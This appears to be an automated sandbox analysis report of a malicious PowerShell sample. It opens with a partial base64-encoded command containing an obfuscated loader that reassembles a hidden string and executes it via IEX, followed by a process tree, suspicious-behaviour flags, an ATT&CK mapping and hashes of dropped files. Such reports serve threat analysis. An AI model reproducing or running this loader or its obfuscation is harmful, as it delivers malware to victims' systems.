AByAG4ARgByAGkAdgBvAG8AUwBlAHQAbwBtAGMAUgB5AHQAbQBlADEAcABvAHMAdABlADkATgBpAHQAcgBvACwAVQBkAGsAcgB0AGkAUwB0AG8AcgB2AG4AUgBlAGgAbwBlAHQATQBhAHMAawBpACAAQwBvAHIAawBlAE0AQwBvAHcAZwByAGEAUABhAHQAaABvAHIAQQBwAGkAYQBjACwARQBtAGIAYQBsAGkAcABvAHMAdABhAG4ASQBtAHAAZQByAHQATABpAHQAaQBnACAAUwBrAG8AbABlAFMAUAByAG8AdABvAGwARABoAGEAbQBhAGkAUAByAGUAZABpAHAAUwBvAHIAdABlAHAAUwB1AGIAcwB0AGUASQBtAHAAYQBzACkATQBvAG4AbwBwADsACgBwAGUAcgBzAHAAWwBGAG8AbgB0AHcARABTAHAAaQBuAG4AbABPAHAAbABpAHYAbABQAHIAZQB0AHQASQBrAGEAcgB5AG8AbQBVAG4AYwBvAHUAcABGAG8AcgByAGUAbwBGAG8AcgBlAHMAcgBTAGkAZABlAHIAdABvAHIAZwBhAG4AKABMAGkAbgBlAG4AIgBJAG4AZABzAG4AQQBEAGEAbQBuAGUARABLAGwAYQB0AHQAVgBHAGwAYQBzAHAAQQBJAG4AdABlAHIAUABHAHIAZQBmAGYASQBBAHIAZwB1AG0AMwBTAHkAbQBwAGEAMgBEAGUAdAAgAFIALgBDAHkAYwBsAGkARABNAG8AbgBvAG0ATABGAHIAdQBnAHQATABQAGgAYQBlAHQAIgBiAHUAbgBkAGYAKQBIAGEAZwBsAGIAXQBLAG4AYQBwAHAAcABPAHAAaABhAHYAdQBFAGYAdABlAHIAYgBQAGEAcgBrAGUAbABKAG8AcgBkAGUAaQB2AGUAcwB0AGwAYwBUAGUAawBzAHQAIABOAG8AbgBzAHkAcwBTAGMAbABlAHIAdABHAGUAbgBpAHQAYQBEAHIAaQBrAGsAdABoAHUAbQBvAHIAaQBTAGsAaQBsAHQAYwBHAGUAbgBuAGUAIABEAGUAcgBtAG8AZQBUAHkAZgB1AHMAeABZAGUAdQBrAGUAdABFAHgAaQBtAGkAZQBTAHcAZQBlAHQAcgBMAHUAcgBlAHIAbgBTAHQAdQBuAGQAIABNAGUAZABpAGsAaQBDAG8AbABwAGUAbgBWAGkAdABhAGwAdABPAHYAZQByAGQAIABEAGUAZgBpAGwAUwBJAG4AdgBlAHMAZQBSAGUAaQBuAHYAdABUAG8AdABhAGwAUwBTAHcAZQBlAHAAZQBEAGkAdAB0AGkAYwBPAHYAZQByAHMAdQBNAGUAaQBrACAAcgBFAG4AZwBsAGkAaQBFAG0AYgByAG8AdABBAHIAZQBhAGwAeQBSAG8AZABvAG0ARABOAGEAcwB0AGkAZQBPAHUAdABkAHIAcwBPAHYAZQByAGgAYwBHAG8AbABkAGEAcgBLAGwAaQBtAHAAaQBrAGwAZQBzACAAcABGAG8AcgBtAGkAdABTAHAAbwByAHQAbwBiAGEAcwBlAGwAcgBCAGUAZwB1AG4ARABFAG4AdABlAHIAYQBTAHAAbwBvAG4AYwBNAHkAcgBpAG8AbABOAGkAYwBrAGUAKABDAG8AbABvAG4AaQBHAGUAbwBnAHIAbgBTAGUAYwByAGUAdABJAG4AdgBlAHMAIABmAGEAYgB1AGwAVQBQAHIAbwB0AGUAbgBIAHkAcABoAGEAZABQAG8AbgB0AGkAcgBUAGEAawBrAGEAdQBwAHIAZQBkAGkALABWAGUAcgBpAHMAaQBTAGMAYQByAGUAbgBCAGoAZQByAGcAdABTAG0AZQBsAHQAIABDAGEAcgBiAGkAUwBMAGUAZwBvAHMAdABQAGEAcgBhAGcAZQBBAG4AawBsAGEAbQBGAGkAbABtAHMAbQBBAG4AdABpAGsALABHAHIAYQBkAHUAaQBNAGEAZwBuAGUAbgBNAGUAZABsAGkAdABPAHYAZQByAGgAIABPAHAAYgB5AGcAbQBMAGEAYQBuAGUAdQBGAHUAZwBlAHMAbABTAHQAZQBsAGwAdABTAHUAYgBzAHQAaQBCAHIAZQBhAGQALABQAGUAcgBhAHUAaQBlAGwAZQBjAHQAbgBTAHAAbwB0AHAAdABIAHkAbABkAGUAIABLAHUAbABtAGkARABJAG4AdABlAHIAdQBUAGkAbABnAG8AZQBBAHAAYQByAHQAZgBHAHIAbwBzAHMAKQBMAHUAZgB0AHMAOwAKAFMAawBvAGwAZQBbAEQAZQBuAGUAcgBEAFUAbgBzAGgAYQBsAFQAZQByAG0AaQBsAEgAbwBsAGQAcwBJAG8AeABpAGQAYQBtAEkAbgBzAGMAcgBwAEUAeABpAHQAZQBvAEYAbwByAG0AeQByAHIAYQBkAGkAawB0AGQAbwBtAGkAbgAoAFMAdABvAGwAbwAiAFAAZQBsAHYAaQB1AFMAaQBkAGUAZgBzAEgAbwBtAGUAbwBlAEgAbwBtAGUAcwByAEUAZgB0AGUAcgAzAHMAYQBsAGwAeQAyAEEAbgBzAGkAZwAiAEwAeQBzAG0AYQApAFAAaABvAHQAbwBdAEQAYQBjAHQAeQBwAFMAYQBtAG8AcwB1AFMAYQBtAG0AZQBiAEMAbwBwAGUAIABsAFUAbgBjAGgAbABpAFQAZQBsAGUAbwBjAEEAcwB0AHIAbwAgAFQAcgBzAHQAZQBzAEIAZQBzAHYAcgB0AEgAZQBhAHYAeQBhAE0AYQBuAGYAcgB0AFQAdQBnAHQAZQBpAHkAbwBrAG8AbwBjAFAAYQBhAGIAZQAgAHIAaQBnAGUAbABlAE0AdQBuAGQAaAB4AEcAYQBzAG4AaQB0AEgAbwB2AGUAZABlAFUAZABlAG4AcgByAEYAbwByAGUAcwBuAEwAZQBnAGUAbgAgAFAAdQB6AHoAbABpAEYAbwByAHQAYQBuAEoAbwB5AHIAaQB0AFMAbgBhAHAAbwAgAEEAbgB0AGkAbgBHAFQAYQBsAGUAbgBlAE0AYQBrAHMAaQB0AFMAYwBpAGEAZwBEAE8AdQB0AGwAYQBDAEEAcABvAGsAYQAoAFIAbwBiAHUAcwBpAFUAZABmAHkAbABuAFUAbgBkAHMAZQB0AEIAcgBhAG4AYwAgAFQAdgBhAG4AZwBCAFYAYQB0AGUAcgBhAFAAbABlAHUAcgBzAE0AZQBsAGMAaAB0AFUAbgBkAGUAcgBuAFQAaABvAHIAYQBpAEYAcgBpAG4AZwApAEYAbwByAHMAdAA7AAoASwB3AGEAbgB6AFsARwBlAG4AZQByAEQARABhAGkAbAAgAGwAZABlAG0AIAByAGwAcwBwAGkAbgBkAEkAUwBlAHIAdgBpAG0AUwBtAGUAZABlAHAAQgBlAHQAdAB5AG8AVQBuAHQAaABpAHIAQQBpAHIAZAByAHQAaQBjAGgAdABoACgASwBvAG0AZQB0ACIAdgBhAHQAdABlAGsAQgBlAGMAbABvAGUAQgByAHUAbgBqAHIARwByAG8AdQBwAG4ARABpAHMAaQBuAGUAQgByAGUAdwBlAGwATwBiAHMAdAByADMASABhAG4AdABzADIATwB2AGUAcgBkACIARgB5AHIAYQBmACkATgBvAG4AYgBvAF0AUABhAGwAcABhAHAAQgByAGEAbgBkAHUAQgByAGEAbgBkAGIAQQBmAGgAbwBlAGwAUAByAGkAcwBsAGkATgBhAHoAaQBzAGMATgB5AGwAbwBuACAASQBuAGYAbAB1AHMAQgBhAG4AbgBlAHQAUgBhAG4AZABiAGEAUwBjAGEAcAB1AHQARgBlAGoAbAByAGkAUgBlAGQAZABlAGMAVwBlAGEAdABoACAAUgBlAGYAZQBlAGUAQgBvAG0AYgBhAHgAUwB0AG8AdQBuAHQAQgB5AGcAZwBlAGUAYQB2AG8AdQByAHIARQB2AGEAbgBnAG4AVABpAGwAcwBrACAAQQBuAGkAbAAgAGkAcwBwAG8AcgB0AG4ASQBuAHQAZQByAHQAdAB1AG4AZQBzACAAQgBlAGYAcwB0AEMARgBvAG4AZABzAHIAUwBrAGkAYQBiAGUAUAByAG8AYwBvAGEATwBwAGgAaQBvAHQAUgB1AHQAZQBiAGUAVAByAGEAawB0AFAAQwBsAG8AYwBrAGkATwBrAG8AbgBpAHAAQgBhAHIAcQB1AGUATQBlAHMAbwByACgATwBtAGwAcwBuAGkAUwBwAGkAZABzAG4AaQBkAGUAYQBsAHQARgBlAHIAcwBrACAAdQBuAHAAbABpAEUARgBsAHkAdgBlAG4AUwB2AGEAbgBlAHQAbgBhAHQAdQByAHIAUwBhAHYAbAAgAGQASQBuAGcAdQByAHIATQBhAHIAYQByACwAUABvAHIAdABhAGkATQB1AHMAaQBrAG4AQwBvAG4AaQBkAHQAUwBrAG4AbQBhACAARABpAGMAYQBjAEMAVgByAGQAaQBvAGEAQQBhAHIAaAB1AGsAdgBlAHIAaQBmACwATQBpAHMAYwBvAGkAUwBrAG4AaABlAG4AcwBsAGEAdABpAHQASgBvAHUAcgBuACAARQBnAG8AaQBzAEgAQwBvAHIAcgB1AHUAUwB1AGIAcwBpAHMASgB1AGwAZQBzAGEAVQBuAHAAaABvAHIAQgBsAGUAbgBkAHIAVAByAGEAbgBzACwARABvAHUAcABpAGkAUwBuAHUAcwBlAG4AUwBwAHIAZQBkAHQAUwBuAGUAcABwACAASgBhAGkAbABlAEoAVABvAG0AYgBzAGEAUwBvAG4AYQBuAGMATwB4AHkAYgBlAGsAQQBsAGIAdQBtAHkAQQBkAGUAbgBhACkASwBvAGsAZQB0ADsACgB1AG4AYQBjAGMAWwBVAGEAcgBiAGUARABUAHkAdgB0AGUAbABUAHIAdQBnAG0AbABWAG8AdgBlAGgASQBCAGkAcwBtAGEAbQBGAHIAZABzAGUAcABJAHMAdABlAG0AbwBPAHAAdABhAGcAcgBHAGkAbABkAG4AdABSAGUAZwBsAGUAKABzAHEAdQBhAG0AIgBVAG4AZABlAHIAZwBTAGsAbwB2AGIAZABEAGEAdABhAG0AaQBDAG8AdABzAGUAMwBnAHIAdQB0AGMAMgBLAG8AbgB2AGUAIgBUAG8AbQBtAGUAKQBGAHIAYQBmAHIAXQBVAG4AdABvAHUAcABQAHIAbwBwAHIAdQBNAGkAYwByAG8AYgBQAGUAcgB0AHUAbABCAGUAZgBvAGwAaQBPAHUAdABiAHUAYwBOAGEAYwBoAGUAIABHAHIAdQBuAGQAcwBTAGUAbABzAGsAdABLAGEAcgBsAGUAYQBTAGQAcwB1AHAAdABzAHAAbwByAHQAaQBtAHUAcgBlAG4AYwBzAGkAbgBnAGUAIABTAHkAcwB0AGUAZQBSAGEAYgB1AGwAeABQAGwAZQBuAHQAdABXAGkAbgBhAHMAZQBNAGEAYQBzAGUAcgBMAHUAZgB0AGsAbgBCAGUAbQB1AGYAIABSAGEAYgBsAGUAaQBJAG4AdABlAGcAbgBTAHUAZwBnAGUAdABTAHUAcABlAHIAIABJAG0AYgByAHUARwBCAGUAcABsAGEAZQBQAHIAZQBiAG8AdABhAGQAZwBhAG4ASQBDAGgAYQBwAG0AQwBDAG8AdAB0AG8ATQBUAG8AZQByAHQAUABOAG8AbgByAGkAcgBJAG4AcwB1AGwAbwBzAGMAaABsAGUAZgBTAHYAaQBkAG4AaQBIAHkAZwBlAGUAbABOAG8AbgBjAGwAZQBTAHUAYgBvAHIAKABOAG8AbQBpAG4AaQBVAG4AZABpAGYAbgBCAHIAbwBuAHoAdABNAHUAbAB0AGkAIABUAGUAawBuAG8AQQBBAGMAYwBpAGQAZgBEAGkAcABsAG8AZgBBAGQAdgBhAHIAaQBzAHQAZQBuAHIANwBTAGsAcgBlAHMAOABDAGgAaQBlAGYALABGAGEAbABrAHMAaQBFAGwAZgBvAHIAbgBNAG8AcwBhAHMAdABrAGEAbQBwAGUAIABMAG8AZwBhAHIAVQBUAGkAbABiAGEAbgBTAHUAcABwAG8AZABOAHkAeABpAHMAZQBBAHIAYQBjAGUAcgBCAGEAcgBiAGEAdABCAGUAdwBpAGwAMgBzAHUAcABwAG8ALABtAG8AdQByAGkAaQBhAGMAYwByAGUAbgBBAGwAYQBsAHUAdABGAG8AbABrAGUAIABQAGEAcgBjAGUAQgBwAGEAcgBhAHAAYQBmAG8AcgBsAG4AYQBGAHIAZQBtAGsAKQBNAGkAcwBwAHIAOwAKAFMAbwBtAG4AYQBbAEMAaABpAG4AaQBEAEcAaQBsAGUAbgBsAFIAZQBrAGwAYQBsAHAAYQByAGEAbQBJAEoAbwByAGQAcwBtAFAAbABlAGsAaABwAFIAbwB0AGEAbABvAE8AdgBlAHIAaQByAGcAeQByAG8AZwB0AEwAYQBuAGcAdgAoAEEAbgB0AGkAbAAiAEcAbABnAGcAZQBrAEMAYQBtAGEAcgBlAHcAaABpAHQAdAByAEYAbABkAGUAawBuAE4AbwBuAGEAbgBlAGoAbwB1AHIAbgBsAFMAdgBlAG4AZAAzAFIAdQB0AGkAbgAyAE0AZQBuAHQAYQAiAFMAeQBnAGUAbAApAFUAbgB0AHIAYQBdAEQAYQBtAGEAcwBwAFAAbwBzAHQAbAB1AEwAaQBxAHUAaQBiAFUAZgBhAHIAbABsAEYAbwByAHQAdQBpAFIAZQB0AHMAdgBjAGMAeQB0AG8AZwAgAFMAbQBpAHIAYwBzAFUAaQBnAGUAbgB0AFcAaQBtAHAAbABhAFMAbABhAGcAdAB0AEgAZQBtAGkAYQBpAFQAcgBhAHYAZQBjAEYAcgBkAHMAZQAgAFMAbABqAGYAZQBlAEkAcwBmAGwAYQB4AEgAagBlAHIAdAB0AFIAZQBjAGgAYQBlAGYAaQBuAG4AcwByAEMAbwBuAG4AYQBuAEUAdABoAGUAbgAgAEQAYQBnAGQAcgBJAEQAYQBuAG4AbwBuAEIAYQBjAGsAdQB0AEUAbgBkAG8AdABQAEMAbwB1AG4AdAB0AE0AaQBuAGkAcwByAEQAeQByAGUAdgAgAEMAaQBuAG4AYQBFAEwAeQBzAHQAZwBuAFMAdQBiAG8AcgB1AFUAZABmAGwAeQBtAEUAYwBjAGwAZQBTAFAAZQBsAGkAawB5AE4AaQBjAGgAbwBzAFIAZQBzAGIAZQB0AEEAcgB0AHMAYgBlAEgAYQBtAGkAbABtAEIAZQBzAGEAYQBMAFMAYwByAHUAcABvAEgAYQBuAGcAZQBjAEgAbgBkAGUAbABhAFQAaQBkAHMAcwBsAEsAYQByAGEAawBlAFMAdABlAGwAcwBzAFQAcgBpAGMAawBBAFUAbgBwAHIAbwAoAFYAaQBuAHQAZQB1AFMAYQBuAGcAYgBpAE8AegBvAG4AaQBuAEYAYQBrAHQAbwB0AGsAcgBhAHYAcwAgAEMAbwBtAGEAdAB2AEkAbgBrAG8AbQAxAFQAaQBuAGMAaAAsAEYAbwBzAGYAbwBpAE0AaQBjAHIAbwBuAFAAYQByAGUAaQB0AFUAYgBlAHMAdAAgAEMAbwBuAGkAZAB2AFUAZABzAHYAdgAyAEMAaABlAHAAcwApAEkAbgBkAHQAZwA7AAoASQBvAGQAbwB0AH0ACgBVAGgAeQByAGwAIgBJAG4AawBuAGkAQAAKAFIAYQB0AHQAbwAkAHQAZQBnAG4AZQBLAEYAbABlAGsAcwByAGcAcgB1AG4AZAB5AFMAdQBnAGEAcgBtAEIAZQBzAGwAYQBwAFMAdgBhAHIAcwBlAFQAaABhAG0AaQBzAFMAdABvAG4AeQBjAFMAdABhAGwAaQAzAEsAbwBkAGUAcgA9AFYAYQBwAG8AdQBbAE0AbwBuAHQAcgBLAEkAbgB0AHIAYQByAEcAcgBzAHMAbAB5AFMAdQBiAHAAZQBtAHUAcgB1AGcAdQBwAFYAaQBnAGEAbgBlAFMAcAByAGkAbgBzAFAAcwBlAHUAZABjAEYAcgBpAG8AcgAxAHAAYQByAGwAYQBdAEEAbgB0AGEAZwA6AEkAcgBpAGQAbwA6AEUAbgBkAG8AYwBWAEwAcwBrAHUAcgBpAFIAZQBiAGEAbAByAEIAZQBhAHIAYwB0AEgAagBlAHIAdAB1AEEAYwBjAGkAZABhAFMAdABlAHIAbgBsAFMAYwBlAG4AZQBBAFAAYQByAHQAbwBsAEEAbQBwAHUAbABsAGYAdQBzAGUAbgBvAFQAcgBzAHQAZQBjAEgAZQBtAGkAZQAoAGgAbwBvAGQAaQAwAFcAaQBuAGcAYgAsAEEAZQBvAGwAbwAxAFYAcgBuAGUAbgAwAEEAZgBvAHIAaQA0AHMAcABlAGUAZAA4AFAAcgBpAHMAZwA1AEUAbAByAGkAdAA3AFMAdQBiAG4AZQA2AFMAdQBtAG0AZQAsAEsAYQByAHQAbwAxAEsAbwBuAHMAaQAyAFQAcgBpAG4AYQAyAE8AcgBnAGEAbgA4AFMAaABhAGQAeQA4AEsAbgB0AHIAZQAsAFAAbwBzAHQAYQA2AG8AeABpAGQAaQA0AEEAbABsAGUAcgApAAoARgBsAGUAdAB0ACQARgBvAHIAZgByAFMASQBtAG0AdQBuAHAASgBpAHMAbQBzAGkAVQBkAGsAbABhAHIAVQBkAHYAYQBzAGEAQQBuAGwAYgBzAG4ASAB5AHAAZQBkAHQARwBlAHMAdABhAGUATABlAHQAYwBoAHIATwBwAGEAZABnAD0ASABhAGEAbgBkACgAUAByAGUAZgBlAEcASQBsAGwAaQBiAGUAQQBuAHYAaQBsAHQATQBpAHMAcwBpAC0ARgBvAHIAdAB5AEkAUwBwAGUAYwBpAHQAUABlAHIAbABlAGUATQBpAGwAbABpAG0ATQB1AGwAdABpAFAAUAByAG8AdABvAHIAQwBvAHMAbQBvAG8AQQBmAHAAYQB0AHAAUgBhAGEAcwB0AGUARgByAGUAbgBlAHIAUwB1AHAAZQByAHQAQgBhAHIAYgBlAHkAVAB1AHAAaQBsACAAVwBlAHMAdABsAC0ARQBuAG0AZQBzAFAAUAByAGUAdgBhAGEARQBhAHIAdABoAHQAUwBvAGYAYQB2AGgAUwB0AGUAcgBlACAAUgBlAGMAaABhACIAVABvAHIAYwBoAEgAVABpAGQAcwBzAEsASwBhAG0AYgBvAEMARABpAGEAbABlAFUAUABlAG4AZwBlADoAbABpAG4AZwB1AFwAQwBvAG4AYwBvAFMARwByAG4AcwBlAG8AUwBhAGwAbQBlAGYAVQBkAGwAcwBuAHQAUgBlAHAAZQBsAHcARgBvAHIAZQBzAGEASQBuAHQAZQByAHIARABpAGEAdAByAGUAQgByAHUAdAB0AFwAYgBhAHIAbgBlAFQARgBhAGEAdABhAHIARwByAGUAZQBuAHkATgBvAG0AYQBkAGsASQBuAGQAYgBlAGsAVgBpAGwAbABhAGUAUABlAHIAaQBmAHIAawBhAHAAaQB0AHMAUwBsAGkAawBrAHMAcABhAHIAcwBsAGwAVAByAG8AbABsADIAQQB1AGwAZQB0ADMAVAB5AHAAZQBlADkATwBrAGsAZQByACIATwBtAGkAYwByACkAYQBqAG8AdQByAC4ARgBlAGoAbABwAFAARgByAGUAbQBrAHIAUABoAHkAbABhAGEAUwB1AHMAcABlAHQAUABqAGsAawBlAGkAVAByAHYAcgBrAG4ACgBSAG8AcwBjAG8AJABDAGgAcgBvAG4AQgBGAGwAZQB0AGMAZQBTAHQAYQB0AGkAYgBmAGkAcwBzAGUAbwBTAGEAbgBkAGoAZQBSAGkAbgBnAG4AbABNAG8AZABpAGYAcwBCAHIAdQBnAGUAIABFAHAAaQBwAHMAPQBJAG4AZABrAG8AIABNAGEAcgBrAGUAWwByAGgAZQBuAGkAUwBPAHIAZABkAGUAeQBKAGEAZwB0AGgAcwBGAGkAcgBlAG0AdABGAGUAZAB0AGcAZQBFAHQAaABlAHIAbQBHAGUAbgBuAGUALgBMAGEAawBzAGUAQwBBAGQAbQBpAHIAbwBhAG4AdABpAHMAbgBTAGEAdQBuAHQAdgBmAG8AcgBzAGkAZQBrAGwAYQByAGUAcgBGAHIAeQB0AGwAdABNAHUAcwBlAHQAXQBBAGYAZwBpAGYAOgBPAHAAYQByAGIAOgBIAGkAcwB0AGkARgBWAGEAcgBpAGEAcgBOAGUAdABtAGUAbwBBAGYAcwB5AHIAbQBSAGUAZgBlAHIAQgBDAHIAZQBhAGQAYQBzAGsAcgBkAGQAcwBEAGkAcwBrAGYAZQBTAGMAbwByAGUANgBMAHUAbQBiAGEANABCAGEAcgBuAGwAUwBCAGUAdABlAG4AdABTAG8AbAByAHUAcgBGAGwAYQBzAGgAaQBCAGkAcgBlAGYAbgBDAHUAcwB0AG8AZwBXAGkAcgBlAGIAKABEAGUAbgBlAGIAJABpAG4AdABlAHIAUwBBAGQAZQBuAG8AcABWAGEAcABvAHIAaQBCAGkAYwBrAGUAcgB1AGwAZABzAHAAYQBHAGUAbgBkAHIAbgBEAHIAeQBzAG4AdABUAGkAbABzAGkAZQBBAG4AdgBlAG4AcgBtAGkAcgBhAGsAKQAKAFMAaQBnAGkAbABbAHYAcwBlAG4AcwBTAEEAbABsAG8AawB5AFcAaQBuAGQAcABzAFYAaQByAGcAdQB0AFUAZABmAG8AZQBlAFYAYQByAHMAbwBtAE0AZQBzAHMAaQAuAEQAaQBsAHUAdABSAFUAbgBiAG8AcgB1AEIAaQBzAHQAaQBuAEMAbwBuAGMAZQB0AEcAZQBuAG4AZQBpAEEAbQBvAHIAYQBtAEgAbwBkAGcAZQBlAFMAdQBnAGcAZQAuAFQAaQBsAHMAawBJAEsAbwBtAG0AdQBuAEgAeQBkAHIAbwB0AEsAbwBtAHAAZQBlAFQAaQBsAHMAbQByAFUAbgBoAG8AbgBvAE0AYQBnAG4AZQBwAEQAZQBzAHQAcgBTAEsAbgBhAHAAaABlAE0AbwBuAG8AdAByAFQAaQBsAHMAdAB2AEEAZgBzAGEAZwBpAE0AdQBjAG8AdgBjAEEAZgBzAG8AbgBlAEYAbwByAGIAbABzAHQAagBlAG4AZQAuAFMAdABlAG0AcABNAEMAbABpAG4AZwBhAEIAbABhAG4AawByAEYAbAB1AG8AcgBzAEYAbwByAHMAdABoAG0AdQBzAGsAdQBhAEUAagBlAHIAaQBsAEEAcwB0AGUAcgBdAEQAaQBhAHQAZQA6AEMAYQBuAG0AYQA6AFMAdABvAHcAIABDAEEAcgBsAHkAIABvAFUAbgBqAHUAcwBwAFMAcABhAGwAdAB5AEEAYwBjAHUAcwAoAE8AZgBmAGkAYwAkAEEAYwBhAHQAZQBCAFIAcwB2AHAAIABlAFQAdQB0AG8AcgBiAEEAcgB0AGUAZgBvAEsAdQBuAG4AZQBlAEYAcgBlAG4AYwBsAEIAYQBzAHMAZQBzAEEAZwBuAGUAbgAsAHUAbgBzAHQAbwAgAE8AcABpAG4AaQAwAEIAcgBvAHcAbgAsAGUAcgBoAHYAZQAgAFAAbwBsAHkAZwAgAEQAZQByAGkAdgAkAE0AdQBuAGkAdABLAFAAbABhAG4AZQByAEIAeQBrAGUAcgB5AFMAdABlAG0AbQBtAEYAcgB5AHMAZQBwAFMAZQBtAGUAaQBlAFAAcgBvAGYAaQBzAFYAbwBjAGkAZgBjAEEAbgBnAHMAdAAzAFMAawByAGEAYgAsAEQAcgBvAGkAbAAgAFIAZQBuAHMAawAkAEQAZQBjAGMAYQBCAFMAcABhAGwAdABlAEcAYQBuAGcAZQBiAEsAbwBtAG0AdQBvAEEAZgBnAGEAbgBlAEkAbABpAG0AYQBsAE4AZwBvAG0AYQBzAG4AbwBuAGEAZAAuAFAAbABlAGcAYQBjAEIAcgB5AHMAdABvAFMAaQBnAHQAZQB1AEcAYQBuAGcAYgBuAEYAbwByAHQAcgB0AFIAbwBhAGQAdAApAHMAYwB1AHQAYwA7AAoASgB1AGQAYQBpAFsAWgBvAG4AaQBuAEsARQBkAGQAZQByAHIAVQBkAHMAawB5AHkAQgBuAGsAZQB2AG0AQwBhAHMAdABpAHAARwByAGEAbgB1AGUAUABvAGkAcwBlAHMARQBwAGkAZwBhAGMAVQBuAGYAcgBlADEAYgBoACAAYgBlAF0AUwBoAHQAaQBjADoAQgBpAGwAZgBvADoAWgBhAGkAcgBlAEUAcwBjAGwAZQByAG4ASQBuAGQAaQBzAHUAeQBhAG4AZABlAG0ARwByAGEAZABlAFMATwB2AGUAcgBhAHkAUABvAGcAaQBlAHMASwBvAG4AawBsAHQASwBsAGUAcwBrAGUASgB1AG0AcABlAG0AUwBhAG4AZABoAEwAYQBuAG4AdQBsAG8AUwBwAGkAbgBkAGMAVwBlAGEAcgBhAGEAVAByAGsAbgBpAGwATQBhAGwAbwBjAGUASwBhAHQAYQBwAHMATgBhAHQAYQB0AEEARABvAGsAdQBtACgATABhAG0AYQBpACQAUgBhAHQAcwB0AEsATwB2AGUAcgBpAHIARwBsAGEAbgBlAHkATQB1AGwAYwB0AG0AYQBtAGkAdAAgAHAASwBhAGgAeQB0AGUATwBwAG0AdQBuAHMASwBsAGkAbgBpAGMAcABhAGwAYQBlADMAQQByAHYAZQBkACwARABlAGwAZwBnACAAQwBvAG4AZgByADAAVAByAGEAbgBzACkARABpAHAAcwBvACMACgAnAEAADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQA1ADsAIAAkAGkAIAAtAGwAdAAgACQAUwBlAHIAdgBpAHQAdQB0AC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQAQQByAGMAaABnACAAPQAgACQAQQByAGMAaABnACAAKwAgACQAUwBlAHIAdgBpAHQAdQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADEAKQANAAoACQANAAoACQBpAGYAIAAoACQAUwBlAHIAdgBpAHQAdQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAEEAcgBjAGgAZwAgAD0AIAAkAEEAcgBjAGgAZwAgACsAIAAiAGAAbgAiAA0ACgAJAAkAJABpACAAPQAgACQAaQAgACsAIAAxAA0ACgAJAH0AIAAJAA0ACgAJAAkADQAKAAkADQAKAH0ADQAKAA0ACgANAAoASQBFAFgAIAAkAEEAcgBjAGgAZwANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aqevkhuh.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:824
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF059.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF058.tmp"
      4⤵
      PID:584

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESF059.tmp

Filesize
1KB

MD5
968b5771b0c1624af222813c4b6f9d77

SHA1
32450871f51ee74b26e48fb1a3e76a5950a99f6a

SHA256
d34e3c430dfbf88aa16a93c81d3e8706274c29181852375ccf00a549387a28ea

SHA512
a57a5580bcea437b3a2a6afb71f17eb625055e9e8aa5f6930d45de4d5f996227269e4aa5bc3fa1ce410bcaf2963cd2cd5ec37fc46993ce674242bf467d00fb91

Download Submit
C:\Users\Admin\AppData\Local\Temp\aqevkhuh.dll

Filesize
4KB

MD5
53251609874ddfc4888facf144cfe40d

SHA1
61e7492b028a429533dac19f6673fb26bb5adc11

SHA256
469ca50c7cea1218019c5d043d52a3e5bbf304bbd1647406c713b42997d7a972

SHA512
b8c24938fe7d8e376cf586fcf1a04d0cea74142b3f8a89c0a0eff53b9c1e9af9b01b5d76c63fd54cf291e9758e26c39ad152d9596f5ed6e4f72ba0f8578daea7

Download Submit
C:\Users\Admin\AppData\Local\Temp\aqevkhuh.pdb

Filesize
7KB

MD5
bf573d582f80d898123b7e0e08e665d3

SHA1
75c9629f57d3408f198b39620ac9fc5ae9696b82

SHA256
ea0b9da10ca16a6933f1cab4d7b5ab16c4dfcd6c79b68d85a2e2627de22b8a01

SHA512
93afd6fa6b9cbfe24efdcd66ed1b345075cfeb67f63dd930a9a6b03872cce17616c1e44b0f58adf13755848c95ce93029dbd11ab311817054d18ac3f1b27d6a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF058.tmp

Filesize
652B

MD5
531472f61d8e2b008bf860688ad8bed0

SHA1
2b59c44fbd1c98ddd71d367add198c0dba8d19de

SHA256
263ac8980cf81c8a90f441ae070b334176a63ddbc2efdca0633bb7445ba798da

SHA512
322db11536cd79fd358fe4903e5bb765cc90b08af29d1ca3c0af605a041237cff223dd8681c834287979efd76bd9bfd9711409bd3ae0db42ca25df3333be8dfe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aqevkhuh.0.cs

Filesize
1KB

MD5
7b62b00b59b2ff9eaa0d329f281073b6

SHA1
61a24f7a970e9d27f73f683d2ecc33302ccc2bea

SHA256
7f68511a382f007efdfc8ae5ebdabd6259f49fecce1d9e1bf3ffd429a53f8691

SHA512
56eb7adb8521a939b11b913c9bf3c7bd960d4acaae5d20661516a3f31542b578e151171f55bd9df79c1f1958dd89ab90ce02c5723551d1f615961eda16fa2d1b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aqevkhuh.cmdline

Filesize
309B

MD5
964d2e9b4b9611048043ce9bbade3df3

SHA1
1372511038ce9e38765d2955adbcc12186b1888b

SHA256
c0256f2060bdabc72596daef9795172ec462ce8b3d4312274e5c4430ed0846ea

SHA512
828662b527c290e01e577d299d1a1e97d6bf418a889cd9e6110f074275a124c9286c44dc0a4110487aa6e90fb4cf997d2ba97a8c74ba850210192e512dbbd2d4

Download Submit
memory/1764-54-0x000007FEFBF21000-0x000007FEFBF23000-memory.dmp
